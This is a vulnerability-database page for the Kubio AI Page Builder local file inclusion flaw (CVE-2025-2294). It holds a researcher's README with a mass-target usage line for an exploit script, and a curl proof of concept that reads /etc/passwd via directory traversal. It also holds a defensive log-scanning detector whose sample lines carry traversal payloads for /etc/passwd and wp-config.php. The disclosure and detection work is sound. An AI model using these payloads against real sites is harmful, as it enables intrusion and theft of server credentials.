PoC details: 8458218114e7ea1e6481c89a71f567e4ceee0521

Source
Related vulnerability
Title: WordPress plugin Kubio AI Page Builder path traversal vulnerability (CVE-2025-2294)
Description: WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform written in PHP; it lets a personal blog be hosted on a server running PHP and MySQL. A WordPress plugin is an application extension for it. The Kubio AI Page Builder plugin for WordPress, in versions 2.5.1 and earlier, has a path traversal vulnerability. It stems from a local file inclusion in the kubio_hybrid_theme_load_template function, which can allow an unauthenticated attacker to include and execute arbitrary files.
Introduction
# CVE-2025-2294

# 🚨 CVE-2025-2294 - Local File Inclusion (LFI) Vulnerability in Kubio AI Page Builder for WordPress 🧱

## 🔍 Overview

**CVE-2025-2294** is a critical 🔥 Local File Inclusion (LFI) vulnerability affecting the Kubio AI Page Builder plugin for WordPress (versions up to and including 2.5.1). This flaw allows **unauthenticated remote attackers** 👾 to include arbitrary files on the server via the `__kubio-site-edit-iframe-classic-template` URL parameter.

Exploiting this vulnerability may lead to disclosure of sensitive files 📂, remote code execution 💥, and full system compromise 💀.

## 👤 Author

**Muhammad Nizar** — Security Researcher 🔐  
GitHub: [0xWhoami35](https://github.com/0xWhoami35)    
YouTube: [InfoSec Insight](https://www.youtube.com/channel/UC33gQFGBqkqDE0zZNwamCgw) ▶️

---

*Feel free to reach out for questions or collaboration! 🤝*

---

## 📋 Affected Versions

- Kubio AI Page Builder plugin ≤ 2.5.1 🛠️

---

## 🧰 Usage

Run the exploit script with a list of target URLs:

```bash
python3 lfi.py -l list.txt
```

## ⚠️ Vulnerability Details

- **Type:** Local File Inclusion (LFI) 🕳️  
- **Severity:** Critical (CVSS 9.8) 🔥  
- **Attack Vector:** Remote, unauthenticated 🌐  
- **Impact:** Confidentiality, Integrity, Availability 🔐  

---

## 🧪 Proof of Concept (PoC)

```bash
curl "https://target-website.com/?__kubio-site-edit-iframe-preview=true&__kubio-site-edit-iframe-classic-template=../../../../../../../etc/passwd"
```
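The request shape shown in the PoC above is what a defender can hunt for in web-server access logs. The detector below is an added example written for this page, not the repository's `lfi.py` nor code from the plugin author: it assumes combined-format access logs and runs over constructed sample lines, flagging any request whose `__kubio-site-edit-iframe-classic-template` value escapes the template directory (`../` in plain or URL-encoded form, or an absolute path).

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Apr/2025:12:00:01 +0000] "GET /?__kubio-site-edit-iframe-preview=true&__kubio-site-edit-iframe-classic-template=../../../../../../../etc/passwd HTTP/1.1" 200 1834 "-" "curl/8.5.0"
203.0.113.11 - - [10/Apr/2025:12:00:02 +0000] "GET /?__kubio-site-edit-iframe-preview=true&__kubio-site-edit-iframe-classic-template=..%2f..%2f..%2fwp-config.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Apr/2025:12:00:03 +0000] "GET /?__kubio-site-edit-iframe-preview=true&__kubio-site-edit-iframe-classic-template=front-page HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
198.51.100.8 - - [10/Apr/2025:12:00:04 +0000] "GET /wp-login.php HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
"""

PARAM = "__kubio-site-edit-iframe-classic-template"
# Assumed combined log format: client, ident, user, [timestamp], "METHOD target PROTO", status ...
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def is_traversal(value: str) -> bool:
    """True if the template value escapes the template directory.

    Handles repeated percent-encoding (e.g. %252e%252e%252f) and backslashes.
    """
    decoded = value
    for _ in range(3):  # peel nested URL encoding; stop when stable
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    normalized = decoded.replace("\\", "/")
    return "../" in normalized or normalized.startswith("/")


def find_kubio_lfi(log_text: str) -> list:
    """Return one finding per request whose classic-template parameter looks like traversal."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        query = urlsplit(m["target"]).query
        # parse_qs percent-decodes once; is_traversal handles deeper encoding
        for value in parse_qs(query, keep_blank_values=True).get(PARAM, []):
            if is_traversal(value):
                findings.append({"ip": m["ip"], "time": m["ts"],
                                 "status": int(m["status"]), "template": value})
    return findings


if __name__ == "__main__":
    for f in find_kubio_lfi(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} status={f['status']} template={f['template']!r}")
```

A 200 status on a flagged request is the stronger signal, since a patched plugin or a hardened server should not serve the included file.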
File snapshot

[4.0K] /data/pocs/8458218114e7ea1e6481c89a71f567e4ceee0521
├── [4.6K] lfi.py
└── [1.5K] README.md
0 directories, 2 files